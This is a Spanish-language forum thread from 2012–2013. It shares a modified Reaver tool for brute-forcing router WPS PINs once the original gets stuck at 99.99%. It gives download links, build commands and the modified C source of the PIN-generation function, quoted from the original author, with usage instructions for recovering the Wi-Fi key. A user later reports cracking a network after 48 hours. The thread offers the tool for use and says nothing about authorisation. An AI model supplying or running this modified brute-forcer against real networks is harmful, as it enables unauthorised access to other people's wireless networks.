Título: Reaver-wifislax mod para problema 99% Publicado por: ChimoC en 26 Noviembre 2012, 09:46 am Buenas:
De el foro hermano de seguridadwireless (http://foro.seguridadwireless.net/live-wifislax/reaver-wifislax-mod-para-problema-99/msg259172/#msg259172) Aclaraciones: 1-se ha modificado el fichero pins.c para que reaver compruebe todos los pins sin basarse en checksum. 2-este mod se utilizaria solo en caso de que reaver original se quede en 99,9% atascado 3-se requieren los 4 primeros digitos del pin (cuando reaver original se queda en 99 mirar los 4 primeros numeros del ultimo pin) 4-podeis lanzarlo sin poner los 4 primeros digitos ,PERO TARDARIA MESES 5-se ha modificado el instalador ,para que no elimine el reaver original en caso de estar instalado y para que el ejecutable se llame reaver-wifislax , ademas de usar un directorio de trabajo diferente ( /etc/reaver-wifislax) 6-se ha traducido en un 98% al español 7-se han coloreado las partes que mas interesa tener controladas,tales como el pin que testea en cada momento. 8-salvar sesion reaver ( de las distros) , no esta preparado para guardar en xzm las sesiones de este mod ,asi que ojo. 9-NO acepta testear pines completos, solo 4 primeros digitos. 10-si vuestro sistema esta instalado en hd no hay problema con lo de continuar sesiones. _________________________________________________________________________________________ ESPERO QUE OS LEAIS LO ANTERIOR Y EVITAR ASI PREGUNTAS QUE SE RESPONDEN SOLAS _________________________________________________________________________________________ ESTE MOD SE BASA EN LA MODIFICACION DE STEFANO RESPECTO AL FICHERO PINS.C _________________________________________________________________________________________ BETA 4 CHANGELOG: Rectificado contador de porcentaje ( gracias shyraz ) Se pueden especificar pines completos como primer intento Mejorado el sistema de keys , ordenando hacia arriba y prioridad 1 , las combinaciones conocidas compilable para cualquier linux http://www.downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA4.tar.gz modulo xzm wifiway/wifislax http://www.downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc4/reaver-1.4-wifislax-mod-BETA4.xzm (http://img641.imageshack.us/img641/1508/instantnea4s.png) BETA 3 CAMBIOS: modificada toda la pantalla de muestra de datos de wash , ahora esta todo mas junto y ocupa la mitad de espacio que antes , añadidos colores a las zonas indicadoras de bssid essid etc. Añadido lanzador , en la categoria wpa wps para lanzarlo comodamente sin usar consola. Compilable para cualquier linux: http://downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA3.tar.gz Modulo xzm para wifiway 3.x o wifislax 4.x: http://downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA3.xzm _____________________________________________________________________________________________ BETA 1 Paquete compilable e instalable: http://www.downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA1.tar.gz Modulo xzm para wifislax-4.3: http://www.downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA1.xzm Instalar el compilable Código: ./configure --prefix=/usr --sysconfdir=/etc EL EJECUTABLE SE LLAMA reaver-wifislax HAY QUE LLAMARLO DESDE CONSOLA DE MOMENTO NO LO TENGO INTEGRADO EN MENU ____________________________________________ BETA 2 26/11/2012 _____________________________________________ Paquete compilable para cualquier linux : http://downloadwireless.net/Aplicaciones-modificadas/reaver-1.4-wifislax-mod-BETA2.tar.gz Modulo xzm en principio valido para wifiway 3 y wifislax 4: http://downloadwireless.net/modulos-fase-testing/wifislax-4.3-rc3/reaver-1.4-wifislax-mod-BETA2.xzm Título: Re: Reaver-wifislax mod para problema 99% Publicado por: P4nd3m0n1um en 26 Noviembre 2012, 11:11 am igual cambiando el dic se solucionaba.
Título: Re: Reaver-wifislax mod para problema 99% Publicado por: beholdthe en 26 Noviembre 2012, 16:16 pm ChimoC, sabes si esta solución al 99.99% la incluirán en una versión futura de Reaver??
Me intentare explicar mejor... si en el siguiente Backtrack o el siguiente Wifislax que saquen, ya vendrá todo esto incluido? Título: Re: Reaver-wifislax mod para problema 99% Publicado por: ChimoC en 26 Noviembre 2012, 16:50 pm Buenas:
@beholdthe: Creo recordar que un user llamado "Tystar" (también del foro hermano) ya habló con "Stefano" (http://code.google.com/p/reaver-wps/issues/detail?id=195#c41) USUARIONUEVO ha hecho un par de módulos para usarlos en wifiway y wifislax. Si te da error de 99,99% lanzas el módulo con los 4 primeros números del último PIN donde se te haya quedado con el "BUG" Saludos ChimoC P.D.: En BT noi tengo ni idea... solo te puedo comentar de nuestras distros Título: Re: Reaver-wifislax mod para problema 99% Publicado por: beholdthe en 26 Noviembre 2012, 21:41 pm Buenas: Lo probare, dado que tengo un router (ya te comente hace tiempo) que no hay quien pueda con el.@beholdthe: Creo recordar que un user llamado "Tystar" (también del foro hermano) ya habló con "Stefano" (http://code.google.com/p/reaver-wps/issues/detail?id=195#c41) USUARIONUEVO ha hecho un par de módulos para usarlos en wifiway y wifislax. Si te da error de 99,99% lanzas el módulo con los 4 primeros números del último PIN donde se te haya quedado con el "BUG" Saludos ChimoC P.D.: En BT noi tengo ni idea... solo te puedo comentar de nuestras distros Mil gracias por la info y un saludo, espero que todo siga bien :D :D Título: Re: Reaver-wifislax mod para problema 99% Publicado por: HalconEye en 26 Noviembre 2012, 23:34 pm según el autor original del código(por cierto escrito en JAVA... ;-)),es posible evitar el tema del 99,99%,modificando unas líneas de código....en este enlace lo podéis seguir
http://code.google.com/p/reaver-wps/issues/detail?id=195#c41 Comment 41 by stefano....@gmail.com, Oct 22, 2012 I'm proud of you Tystar! You tried harder than anybody else looking for the insight and then you saw the light. So it's time to show that light to all the masses. Assumptions: -the router accepts WPS transaction so it's not giving you continuously "timeout". -you know the first 4 digits of the pin (for example 0123 or 1234 or whatever) retrieve these information using original reaver before applying the modification. --------------------------------------------------------------------------------------------- download reaver: svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only open the file /root/reaver-wps-read-only/src/pin.c with a text editor (save a copy you will need it to reinstall original reaver) after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified): /* EXHAUSTIVE MOD. init */ /* * in these lines trivial modifications are applied over the original code. * these lines have to be considered for demonstration purpose only. * WPA PSK retrieval is not granted. * http://code.google.com/p/reaver-wps/issues/detail?id=195 */ /* set global vars */ int exhaustive_last_digit = 9; int exhaustive_index = 000; /* Builds a WPS PIN from the key tables */ char *build_wps_pin() { char *key = NULL, *pin = NULL; int pin_len = PIN_SIZE + 1; pin = malloc(pin_len); key = malloc(pin_len); if(pin && key) { memset(key, 0, pin_len); memset(pin, 0, pin_len); /* Generate a 7-digit pin */ snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index)); /* Append last digit */ snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit); free(key); if(exhaustive_last_digit==0) { if(exhaustive_index==999) { cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n"); /* Clean up and get out */ globule_deinit(); exit(EXIT_FAILURE); } exhaustive_index++; exhaustive_last_digit=9; }else{ exhaustive_last_digit--; } } return pin; } /* EXHAUSTIVE MOD. end */ -actual reaver have to be uninstalled: cd /root/reaver-wps-read-only/src ./configure make distclean -modified reaver have to be installed: cd /root/reaver-wps-read-only/src ./configure make make install --------------------------------------------------------------------------------------------- call reaver with the option -p 0123 where "0123" are the pin first 4 digits. if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin). using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4). to reinstall original reaver: substitute modified pins.c with the original pins.c that you kept safe somewhere. uninstall and install with same commands as above. Título: Re: Reaver-wifislax mod para problema 99% Publicado por: punky14 en 13 Marzo 2013, 04:36 am alguien me puede explicar como ponerlo en backtrack 5?
Título: Re: Reaver-wifislax mod para problema 99% Publicado por: HalconEye en 8 Mayo 2013, 13:02 pm He usado reavermod desde 0.
Ha tardado 48 horas en obtener los 4 primeros dígitos del pin...a 14 sg por pin Los prueba TODOS dos veces Completamente efectivo.una vez obtenidos los 4 primeros,continúa probándolos TODOS ignorando el cheksum como bien se comenta en el post. Algo así..por ej,suponiendo que sean correctos los 4º,...33440010-33440011-33440012-3340013...etc,etc.. Con tiempo es casi imposible no obtener resultados con reavermod. Excelente trabajo |